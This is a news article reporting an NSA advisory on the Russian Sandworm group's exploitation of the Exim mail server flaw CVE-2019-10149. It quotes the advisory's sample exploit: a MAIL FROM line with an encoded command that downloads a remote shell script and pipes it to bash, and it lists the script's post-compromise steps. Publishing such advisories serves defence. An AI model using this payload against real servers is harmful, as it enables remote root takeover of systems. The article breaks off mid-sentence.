Russian hackers are exploiting bug that gives control of US servers

Enlarge Lino Mirgeler/picture alliance via Getty Images

A Russian hacking group tied to power-grid attacks in Ukraine, the worlds most destructive data wiper worm, and other nefarious Kremlin operations is exploiting a vulnerability that allows it to take control of computers operated by the US government and its partners.

In an advisory published on Thursday, the US National Security Agency said that the Sandworm group was actively exploiting a vulnerability in Exim, an open source mail transfer agent, or MTA, for Unix-based operating systems. Tracked as CVE-2019-10149, the critical bug makes it possible for an unauthenticated remote attacker to send specially crafted emails that execute commands with root privileges. With that, the attacker can install programs of their choosing, modify data, and create new accounts.

A patch CVE-2019-10149 has been available since last June. The attacks have been active since at least August. NSA officials wrote:

The actors exploited victims using Exim software on their public facing MTAs by sending a command in the “MAIL FROM” field of an SMTP (Simple Mail Transfer Protocol) message. Below is a sample, which contains parameters the actor would modify per deployment.

MAILFROM:<${run{x2Fbinx2Fshtctx22execx20x2Fusrx2Fbinx2Fwgetx20x2DOx20x2Dx20http:x2Fx2Fhostapp.bex2Fscript1.shx20x7C x20bashx22}}> Hex decoded command: /bin/sh -c "exec /usr/bin/wget -O - | bash"

Figure 1: Sample “MAIL FROM” exploitation command

When CVE-2019-10149 is successfully exploited, an actor is able to execute code of their choosing. When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain. This script would attempt to do the following on the victim machine: add privileged users disable network security settings update SSH configurations to enable additional remote access execute an additional script to enable follow-on exploitation.

Thursdays advisory said the hackers worked for a specific unit, known as the Main Center for Special Technologies, thats within the GRU, or Russias Main Intelligence Directorate. There is general agreement among security researchers that the hacking group working on behalf of this unit has been responsible for some of the most ambitious and destructive cyberattacks in recent years.

Examples include:

  • Hacks in 2015 and 2016 that triggered power outages in Ukraine
  • The unleashing of NotPetya, a datawiping worm that spread around the world in a matter of hours and cost governments and businesses tens of billions of dollars in damages
  • A malware attack in early 2018 that sRead More – Source